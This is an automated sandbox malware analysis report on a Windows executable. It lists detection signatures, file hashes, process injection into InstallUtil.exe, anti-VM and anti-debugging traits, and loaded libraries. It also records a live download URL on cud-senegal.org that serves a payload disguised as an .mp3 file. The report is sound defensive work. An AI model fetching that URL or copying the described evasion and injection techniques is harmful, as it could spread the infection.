Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TiOWA908TP.exe

Overview

General Information

Sample name:TiOWA908TP.exe
Analysis ID:1590837
MD5:f1bbcbcf580673f86692045f0e6c1141
SHA1:14b1bb7f931dad06ca86e7d1921a3dd09153fa49
SHA256:019e924a0b82a0c448cb283cb72b47ad019ecc4de05fddbd41c983f704271c03
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
AI detected suspicious sample
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to detect virtual machines (SMSW)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • TiOWA908TP.exe (PID: 6584 cmdline: "C:\Users\user\Desktop\TiOWA908TP.exe" MD5: F1BBCBCF580673F86692045F0E6C1141)
    • InstallUtil.exe (PID: 7596 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
      • WerFault.exe (PID: 7660 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7596 -s 1084 MD5: 40A149513D721F096DDF50C04DA2F01F)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.4815695727.000000000276D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000000.00000002.4836173880.0000000006580000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      Process Memory Space: TiOWA908TP.exe PID: 6584JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        Process Memory Space: TiOWA908TP.exe PID: 6584JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          Process Memory Space: InstallUtil.exe PID: 7596JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            SourceRuleDescriptionAuthorStrings
            0.2.TiOWA908TP.exe.6580000.7.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              0.2.TiOWA908TP.exe.6580000.7.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                No Sigma rule has matched
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: TiOWA908TP.exeAvira: detected
                Source: TiOWA908TP.exeVirustotal: Detection: 18%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: TiOWA908TP.exeJoe Sandbox ML: detected
                Source: TiOWA908TP.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 51.159.14.89:443 -> 192.168.11.20:49726 version: TLS 1.2
                Source: TiOWA908TP.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 00000001.00000002.5823783639.0000000000BC8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: ((.pdb3s( source: InstallUtil.exe, 00000001.00000002.5823783639.0000000000BC8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: InstallUtil.exe, 00000001.00000002.5824131154.0000000001058000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: n.pdb source: InstallUtil.exe, 00000001.00000002.5823783639.0000000000BC8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbp source: InstallUtil.exe, 00000001.00000002.5824131154.0000000001058000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: TiOWA908TP.exe, 00000000.00000002.4831977172.00000000054F0000.00000004.08000000.00040000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.4829248242.0000000003729000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.ni.pdb source: TiOWA908TP.exe, 00000000.00000002.4838355628.000000007111B000.00000020.00000001.01000000.00000008.sdmp
                Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000001.00000002.5824131154.00000000010C6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.ni.pdb source: TiOWA908TP.exe, 00000000.00000002.4847834302.00000000712FB000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: TiOWA908TP.exe, 00000000.00000002.4831977172.00000000054F0000.00000004.08000000.00040000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.4829248242.0000000003729000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: TiOWA908TP.exe, 00000000.00000002.4836639493.00000000066E0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: TiOWA908TP.exe, 00000000.00000002.4836639493.00000000066E0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: System.Drawing.ni.pdbRSDS source: TiOWA908TP.exe, 00000000.00000002.4847834302.00000000712FB000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: \??\C:\Windows\System.pdb source: InstallUtil.exe, 00000001.00000002.5824131154.0000000001058000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: HP~n8C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000001.00000002.5823783639.0000000000BC8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: InstallUtil.pdb source: InstallUtil.exe, 00000001.00000002.5824131154.0000000001058000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdbvi source: InstallUtil.exe, 00000001.00000002.5824131154.00000000010C6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: InstallUtil.exe, 00000001.00000002.5824131154.0000000001058000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.pdb source: TiOWA908TP.exe, 00000000.00000002.4838355628.000000007111B000.00000020.00000001.01000000.00000008.sdmp
                Source: Binary string: \??\C:\Windows\InstallUtil.pdbe source: InstallUtil.exe, 00000001.00000002.5824131154.0000000001058000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb source: InstallUtil.exe, 00000001.00000002.5824131154.0000000001058000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: InstallUtil.exe, 00000001.00000002.5824131154.0000000001058000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.pdb source: InstallUtil.exe, 00000001.00000002.5824131154.0000000001058000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\InstallUtil.pdbl source: InstallUtil.exe, 00000001.00000002.5824131154.0000000001058000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: InstallUtil.exe, 00000001.00000002.5824131154.0000000001058000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: TiOWA908TP.exe, 00000000.00000002.4838355628.000000007111B000.00000020.00000001.01000000.00000008.sdmp
                Source: Binary string: System.Drawing.pdb source: TiOWA908TP.exe, 00000000.00000002.4847834302.00000000712FB000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb4 source: InstallUtil.exe, 00000001.00000002.5824131154.0000000001058000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\mscorlib.pdb source: InstallUtil.exe, 00000001.00000002.5824131154.0000000001058000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdbHm source: InstallUtil.exe, 00000001.00000002.5823783639.0000000000BC8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: InstallUtil.exe, 00000001.00000002.5824131154.00000000010AD000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.PDBD source: InstallUtil.exe, 00000001.00000002.5824131154.00000000010C6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdbpx source: InstallUtil.exe, 00000001.00000002.5824131154.00000000010C6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000001.00000002.5823783639.0000000000BC8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: InstallUtil.exe, 00000001.00000002.5824131154.0000000001058000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\mscorlib.pdb~ source: InstallUtil.exe, 00000001.00000002.5824131154.0000000001058000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 4x nop then jmp 0655DCBAh0_2_0655DAD1
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 4x nop then jmp 0655DCBAh0_2_0655DAE0
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 4x nop then jmp 0655D3DFh0_2_0655D371
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 4x nop then jmp 0655D3DFh0_2_0655D380
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 4x nop then jmp 066335E3h0_2_06633663
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 4x nop then jmp 066335E3h0_2_06633378
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: global trafficHTTP traffic detected: GET /post-postlogin/Gjflop.mp3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: cud-senegal.orgConnection: Keep-Alive
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /post-postlogin/Gjflop.mp3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: cud-senegal.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: cud-senegal.org
                Source: TiOWA908TP.exe, 00000000.00000002.4838355628.0000000070A01000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://beta.visualstudio.net/net/sdk/feedback.asp
                Source: TiOWA908TP.exe, 00000000.00000002.4833119987.0000000005FE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: TiOWA908TP.exe, 00000000.00000002.4833119987.0000000005FE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: TiOWA908TP.exe, 00000000.00000002.4815695727.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: TiOWA908TP.exe, 00000000.00000002.4833119987.0000000005FE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
                Source: TiOWA908TP.exe, 00000000.00000002.4815695727.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cud-senegal.org
                Source: TiOWA908TP.exeString found in binary or memory: https://cud-senegal.org/post-postlogin/Gjflop.mp3
                Source: TiOWA908TP.exe, 00000000.00000002.4836639493.00000000066E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                Source: TiOWA908TP.exe, 00000000.00000002.4836639493.00000000066E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                Source: TiOWA908TP.exe, 00000000.00000002.4836639493.00000000066E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                Source: TiOWA908TP.exe, 00000000.00000002.4833119987.0000000005FE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                Source: TiOWA908TP.exe, 00000000.00000002.4836639493.00000000066E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                Source: TiOWA908TP.exe, 00000000.00000002.4836639493.00000000066E0000.00000004.08000000.00040000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.4815695727.000000000276D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                Source: TiOWA908TP.exe, 00000000.00000002.4836639493.00000000066E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                Source: unknownHTTPS traffic detected: 51.159.14.89:443 -> 192.168.11.20:49726 version: TLS 1.2
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05568238 NtResumeThread,0_2_05568238
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05568230 NtResumeThread,0_2_05568230
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_025A27480_2_025A2748
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_025A27380_2_025A2738
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_055661080_2_05566108
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05560F300_2_05560F30
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_055661060_2_05566106
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_055638100_2_05563810
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_055668380_2_05566838
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_055638200_2_05563820
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05560F200_2_05560F20
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_062855280_2_06285528
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_062892630_2_06289263
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_062878F00_2_062878F0
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_0628F9C00_2_0628F9C0
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_062855190_2_06285519
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06281A890_2_06281A89
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06281A980_2_06281A98
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_0628D8400_2_0628D840
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_0628D8500_2_0628D850
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_062D761F0_2_062D761F
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_062DE7000_2_062DE700
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_062D6F680_2_062D6F68
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_062D6F580_2_062D6F58
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_062DE9380_2_062DE938
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_063E34040_2_063E3404
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_063E15A80_2_063E15A8
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_063E15980_2_063E1598
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_063E4A080_2_063E4A08
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_063E00060_2_063E0006
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_063E00400_2_063E0040
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_063EB1C00_2_063EB1C0
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_0655F5700_2_0655F570
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_0655F5620_2_0655F562
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_0655A0F80_2_0655A0F8
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_0663B5A80_2_0663B5A8
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_066316400_2_06631640
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_066316500_2_06631650
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_0663B59E0_2_0663B59E
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_0666DB7F0_2_0666DB7F
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_066699900_2_06669990
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_0666A6F90_2_0666A6F9
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_0666A7080_2_0666A708
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_066677EA0_2_066677EA
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_066677F80_2_066677F8
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_066600400_2_06660040
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_066600060_2_06660006
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_0666F1980_2_0666F198
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06665E200_2_06665E20
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_0666DEB70_2_0666DEB7
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_066699800_2_06669980
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_0677F9300_2_0677F930
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_0677DFD00_2_0677DFD0
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_067600400_2_06760040
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_067600350_2_06760035
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_02D616E21_2_02D616E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_02D610181_2_02D61018
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_02D610281_2_02D61028
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_02D617991_2_02D61799
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_02D617B71_2_02D617B7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_02D617021_2_02D61702
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_02D6173E1_2_02D6173E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7596 -s 1084
                Source: TiOWA908TP.exe, 00000000.00000002.4838355628.00000000705FB000.00000020.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs TiOWA908TP.exe
                Source: TiOWA908TP.exe, 00000000.00000000.4569786094.000000000029C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameUyhul.exe, vs TiOWA908TP.exe
                Source: TiOWA908TP.exe, 00000000.00000002.4831977172.00000000054F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs TiOWA908TP.exe
                Source: TiOWA908TP.exe, 00000000.00000002.4829248242.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs TiOWA908TP.exe
                Source: TiOWA908TP.exe, 00000000.00000002.4836639493.00000000066E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs TiOWA908TP.exe
                Source: TiOWA908TP.exe, 00000000.00000002.4815695727.000000000276D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs TiOWA908TP.exe
                Source: TiOWA908TP.exe, 00000000.00000002.4833904593.00000000060F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNiiug.dll" vs TiOWA908TP.exe
                Source: TiOWA908TP.exe, 00000000.00000002.4815695727.0000000002872000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKaxhapdc.exe" vs TiOWA908TP.exe
                Source: TiOWA908TP.exe, 00000000.00000002.4829248242.0000000003B04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKaxhapdc.exe" vs TiOWA908TP.exe
                Source: TiOWA908TP.exe, 00000000.00000002.4847834302.00000000712FB000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.dllT vs TiOWA908TP.exe
                Source: TiOWA908TP.exe, 00000000.00000002.4847834302.00000000712FB000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: lastOriginalFileName vs TiOWA908TP.exe
                Source: TiOWA908TP.exe, 00000000.00000002.4812714389.000000000073E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs TiOWA908TP.exe
                Source: TiOWA908TP.exeBinary or memory string: OriginalFilenameUyhul.exe, vs TiOWA908TP.exe
                Source: TiOWA908TP.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engineClassification label: mal88.evad.winEXE@4/0@1/1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7660:64:WilError_03
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\2946343d-3bbe-47ac-b826-823fa09ed27fJump to behavior
                Source: TiOWA908TP.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: TiOWA908TP.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\TiOWA908TP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: TiOWA908TP.exeVirustotal: Detection: 18%
                Source: unknownProcess created: C:\Users\user\Desktop\TiOWA908TP.exe "C:\Users\user\Desktop\TiOWA908TP.exe"
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7596 -s 1084
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
